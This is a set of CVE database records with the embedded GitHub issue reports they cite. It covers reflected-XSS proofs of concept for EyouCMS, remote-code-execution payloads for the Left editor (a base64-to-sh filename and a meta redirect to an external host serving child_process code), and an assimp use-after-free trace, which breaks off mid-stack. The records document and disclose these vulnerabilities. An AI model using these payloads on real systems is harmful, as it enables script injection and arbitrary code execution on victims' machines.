[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974", "versionEndExcluding": null, "versionEndIncluding": "1.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/35
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
## Background of Website Reflected Cross-Site Scripting ### Influenced Version <= 1.6.0-UTF8-SP1 <img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png"> ### Description Background article publish with reflected-XSS in the cookie "ENV_GOBACK_URL". ### POC ```text POST /cms/eyoucms/login.php?m=admin&c=Article&a=add&lang=cn HTTP/1.1 Host: 127.0.0.1:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Origin: http://127.0.0.1 Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Article&a=add&typeid=10&gourl=http%3A%2F%2F10.142.11.10%3A20003%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D10%26lang%3Dcn&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; workspaceParam=index%7CArchives; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3D"/><script>alert(1)</script><a; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn Content-Type: application/x-www-form-urlencoded Content-Length: 383 gourl=&free_content=&htmlfilename=&type_tempview=view_article.htm&tempview=view_article.htm&add_time=2022-11-05+20:47:11&arcrank=0&click=846&author=aa&seo_description=gaeg&seo_keywords=egae&seo_title=aeg&tags=aeg%2C%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F&addonFieldExt[content]=<p>aegaeg</p>&size=1&part_free=0&users_price=&litpic_remote=&litpic_local=&jumplinks=&typeid=11&title=aegaeg ``` ### Screen Shoot <img width="1576" alt="image" src="https://user-images.githubusercontent.com/22876693/201615717-be81fb04-1140-4e59-b83b-16244cab3fc8.png"> > Reported by Srpopty, vulnerability discovered by using Corax.
Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/35/comments
1
2022-11-14T08:49:28Z
2023-02-20T10:13:18Z
https://github.com/weng-xianhu/eyoucms/issues/35
1,447,638,304
35
4,631
CVE-2022-45539
2023-01-20T19:15:16.223
EyouCMS <= 1.6.0 was discovered a reflected-XSS in FileManager component in GET value "activepath" when creating a new file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/38" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/38" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974", "versionEndExcluding": null, "versionEndIncluding": "1.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/38
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
## Background of Website Reflected Cross-Site Scripting ### Influenced Version <= 1.6.0-UTF8-SP1 <img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png"> ### Description Background file adding with reflected-XSS in the get value "activepath". ### POC ```text GET /cms/eyoucms/login.php?m=admin&c=Filemanager&a=newfile&activepath=%3Atemplate"/><script>alert(1)</script><a&lang=cn HTTP/1.1 Host: 127.0.0.1:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Origin: http://127.0.0.1 Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Filemanager&a=index&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex ``` ### Screen Shoot <img width="1260" alt="image" src="https://user-images.githubusercontent.com/22876693/201619455-f28827d5-5826-4241-8fcd-9a7a8821f0d9.png"> > Reported by Srpopty, vulnerability discovered by using Corax.
Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/38/comments
1
2022-11-14T09:06:48Z
2023-02-20T08:22:13Z
https://github.com/weng-xianhu/eyoucms/issues/38
1,447,664,065
38
4,632
CVE-2022-45540
2023-01-20T19:15:16.287
EyouCMS <= 1.6.0 was discovered a reflected-XSS in article type editor component in POST value "name" if the value contains a malformed UTF-8 char.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/37" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/37" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974", "versionEndExcluding": null, "versionEndIncluding": "1.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/37
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
## Background of Website Reflected Cross-Site Scripting ### Influenced Version <= 1.6.0-UTF8-SP1 <img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png"> ### Description Background article type adding with reflected-XSS in the post value "name" when the value contains malformed UTF-8 chars, this xss payload will be showed in error reporting message. ### POC ```text POST /cms/eyoucms/login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1 Host: 127.0.0.1:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://127.0.0.1 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Field&a=arctype_add&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex Content-Type: application/x-www-form-urlencoded Content-Length: 91 channel_id=-99&remark=af&dfvalue=&dtype=text&name=<script>alert(1)</script>%C0aef&title=aef ``` ### Screen Shoot ![image](https://user-images.githubusercontent.com/22876693/201618239-d45d61ad-ed2c-446c-b236-badcf8c8145c.png) > Reported by Srpopty, vulnerability discovered by using Corax.
Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/37/comments
1
2022-11-14T09:00:48Z
2023-02-20T08:36:11Z
https://github.com/weng-xianhu/eyoucms/issues/37
1,447,653,340
37
4,633
CVE-2022-45541
2023-01-20T19:15:16.347
EyouCMS <= 1.6.0 was discovered a reflected-XSS in the article attribute editor component in POST value "value" if the value contains a non-integer char.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/36" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974", "versionEndExcluding": null, "versionEndIncluding": "1.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/36
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
## Background of Website Reflected Cross-Site Scripting ### Influenced Version <= 1.6.0-UTF8-SP1 <img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png"> ### Description Background article attribute type changing with reflected-XSS in the post value "value" when the value contains non-integer char, this xss payload will be showed in error reporting message. ### POC ```text POST /cms/eyoucms/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1 Host: 127.0.0.1:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://127.0.0.1 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=ArchivesFlag&a=index&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex; ENV_IS_UPHTML=0 Content-Type: application/x-www-form-urlencoded Content-Length: 90 value=%BA0<script>alert(1)</script>&field=status&id_value=1&id_name=id&table=archives_flag ``` ### Screen Shoot ![image](https://user-images.githubusercontent.com/22876693/201617314-9974739a-12ef-4da5-9bbc-dc252941a50c.png) > Reported by Srpopty, vulnerability discovered by using Corax.
Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/36/comments
1
2022-11-14T08:56:29Z
2023-02-20T10:01:25Z
https://github.com/weng-xianhu/eyoucms/issues/36
1,447,647,465
36
4,634
CVE-2022-45542
2023-01-20T19:15:16.400
EyouCMS <= 1.6.0 was discovered a reflected-XSS in the FileManager component in GET parameter "filename" when editing any file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/33" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974", "versionEndExcluding": null, "versionEndIncluding": "1.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/33
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
## Background of Website Reflected Cross-Site Scripting ### Influenced Version <= 1.6.0-UTF8-SP1 <img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png"> ### Description Background file management editor with reflected-XSS in the get value "filename". ### POC ```text GET /cms/eyoucms/login.php?m=admin&c=Filemanager&a=edit&filename=li|"><script>alert(1)</script><!--sts_media.htm&activepath=%3Atemplate%3Amobile&lang=cn HTTP/1.1 Host: 127.0.0.1:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Filemanager&a=index&activepath=%3Atemplate%3Amobile&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex ``` ### Screen Shoot <img width="1441" alt="image" src="https://user-images.githubusercontent.com/22876693/201612233-8e16dccb-774b-433b-b6f2-306216deb043.png"> > Reported by Srpopty, vulnerability discovered by using Corax.
Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/33/comments
1
2022-11-14T08:34:33Z
2023-02-20T10:49:48Z
https://github.com/weng-xianhu/eyoucms/issues/33
1,447,617,306
33
4,635
CVE-2022-45557
2023-01-20T19:15:16.453
Cross site scripting (XSS) vulnerability in Hundredrabbits Left 7.1.5 for MacOS allows attackers to execute arbitrary code via file names.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hundredrabbits/Left/issues/167" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hundredrabbits/Left/issues/167" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:left_project:left:7.1.5:*:*:*:*:*:*:*", "matchCriteriaId": "D1EB1E67-2D41-4AAE-A566-AB62A7FBCAB7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "79" ]
79
https://github.com/hundredrabbits/Left/issues/167
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hundredrabbits", "Left" ]
``` Author: bob11.devranger@gmail.com OS: macOS Version: 7.1.5 ``` ## Summary It has been possible to trigger xss and Remote Code Execution via filename ## Description You can trigger Remote Code Execution using require because the file name generates an XSS. If you name the file `<img src=x onerror=require('child_process').exec('echo$IFS"b3BlbiAtYSAvU3lzdGVtL0FwcGxpY2F0aW9ucy9DYWxjdWxhdG9yLmFwcA=="|base64$IFS-d|sh')>.md` and open it with Left, the RCE will be triggered. [macOS] filename `<img src=x onerror=require('child_process').exec('echo$IFS"b3BlbiAtYSAvU3lzdGVtL0FwcGxpY2F0aW9ucy9DYWxjdWxhdG9yLmFwcA=="|base64$IFS-d|sh')>.md` <img width="1073" alt="image" src="https://user-images.githubusercontent.com/66944342/201718877-044d3fe8-9630-4186-a04c-b7300c38c2da.png"> ## PoC https://drive.google.com/file/d/1RgjPqX3rKthP2JlJEtQeqWpYKSi6tb16/view?usp=sharing ## What’s More? * if you have any problems, contact me via [[bob11.devranger@gmail.com](mailto:bob11.devranger@gmail.com)] * Thank You!
XSS and RCE Vulnerabilities via Filename
https://api.github.com/repos/hundredrabbits/Left/issues/167/comments
0
2022-11-14T17:24:42Z
2022-11-14T17:54:17Z
https://github.com/hundredrabbits/Left/issues/167
1,448,457,699
167
4,636
CVE-2022-45558
2023-01-20T19:15:16.507
Cross site scripting (XSS) vulnerability in Hundredrabbits Left 7.1.5 for MacOS allows attackers to execute arbitrary code via the meta tag.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hundredrabbits/Left/issues/168" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hundredrabbits/Left/issues/168" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:left_project:left:7.1.5:*:*:*:*:*:*:*", "matchCriteriaId": "D1EB1E67-2D41-4AAE-A566-AB62A7FBCAB7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "79" ]
79
https://github.com/hundredrabbits/Left/issues/168
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hundredrabbits", "Left" ]
``` Author: bob11.devranger@gmail.com OS: macOS Version: 7.1.5 ``` ## Summary It has been possible to trigger Remote Code Execution via meta redirect ## Description When you open the .md file containing the mata tag, the meta tag is applied and the location can be moved to the hacker server via meta redirect. [macOS] file content ``` <meta http-equiv="refresh" content="0; url=https://ursobad.xyz/xss/a.html"></meta> ``` ```html <!-- a.html--> <script> require('child_process').exec('open -a /System/Applications/Calculator.app') </script> ``` <img width="932" alt="image" src="https://user-images.githubusercontent.com/66944342/201728795-c4ace076-0cf9-4b89-9ae2-49f90859c07b.png"> [Windows] file content ``` <meta http-equiv="refresh" content="0; url=https://ursobad.xyz/xss/b.html"></meta> ``` ```html <!-- b.html--> <script> require('child_process').exec('calc') </script> ``` <img width="1680" alt="image" src="https://user-images.githubusercontent.com/66944342/201728707-80c34782-3350-402a-9ce1-16be6dff96d9.png"> ## PoC https://drive.google.com/file/d/1pEjEgBIuv2-cWw9is5bG8BeqC5ngfsnA/view?usp=sharing ## What’s More? * if you have any problems, contact me via [[bob11.devranger@gmail.com](mailto:bob11.devranger@gmail.com)] * Thank You!
RCE Vulnerabilities via meta redirect
https://api.github.com/repos/hundredrabbits/Left/issues/168/comments
0
2022-11-14T17:55:16Z
2022-11-14T17:55:16Z
https://github.com/hundredrabbits/Left/issues/168
1,448,494,880
168
4,637
CVE-2022-45748
2023-01-20T19:15:16.560
An issue was discovered with assimp 5.1.4, a use after free occurred in function ColladaParser::ExtractDataObjectFromChannel in file /code/AssetLib/Collada/ColladaParser.cpp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/assimp/assimp/issues/4286" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/assimp/assimp/issues/4286" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:assimp:assimp:5.1.4:*:*:*:*:*:*:*", "matchCriteriaId": "FE7D0D53-6814-4F31-943D-A2FB7358A3CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/assimp/assimp/issues/4286
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "assimp", "assimp" ]
# Environment Ubuntu 18.04,64 bit # Command **Compile test program:** ```shell $ cmake CMakeLists.txt $ cmake --build . ``` **Compile test program with address sanitizer:** - Update Makefile: ```cmake SET (CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address -fno-omit-frame-pointer") SET (CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -fno-omit-frame-pointer ") SET (CMAKE_LINKER_FLAGS "${CMAKE_LINKER_FLAGS} -fsanitize=address -lasan -lstdc++ ") SET (CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=address -lasan -lstdc++ ") ``` - Compile program: ```shell $ mkdir asan_assimp $ cd asan_assimp $ export CC=/usr/bin/gcc $ export CXX=/usr/bin/g++ $ cmake CMakeLists.txt $ cmake --build . ``` # Result The result of running without ASAN: ```shell $ ./assimp info Assimp\:\:ColladaParser\:\:ExtractDataObjectFromChannel_heap-use-after-free Launching asset import ... OK Validating postprocessing flags ... OK Segmentation fault (core dumped) ``` Information obtained by using ASAN: ```shell $ ./Asanassimp info Assimp\:\:ColladaParser\:\:ExtractDataObjectFromChannel_heap-use-after-free Launching asset import ... OK Validating postprocessing flags ... OK ================================================================= ==19874==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000000230 at pc 0x7ffff5ec697a bp 0x7fffffffaa40 sp 0x7fffffffaa30 READ of size 4 at 0x602000000230 thread T0 #0 0x7ffff5ec6979 in Assimp::ColladaParser::ExtractDataObjectFromChannel(Assimp::Collada::InputChannel const&, unsigned long, Assimp::Collada::Mesh&) (/root/asan_assimp/bin/libassimp.so.5+0x961979) #1 0x7ffff5ec611b in Assimp::ColladaParser::CopyVertex(unsigned long, unsigned long, unsigned long, unsigned long, Assimp::Collada::Mesh&, std::vector<Assimp::Collada::InputChannel, std::allocator<Assimp::Collada::InputChannel> >&, unsigned long, std::vector<unsigned long, std::allocator<unsigned long> > const&) (/root/asan_assimp/bin/libassimp.so.5+0x96111b) #2 0x7ffff5ec5a35 in Assimp::ColladaParser::ReadPrimitives(pugi::xml_node&, Assimp::Collada::Mesh&, std::vector<Assimp::Collada::InputChannel, 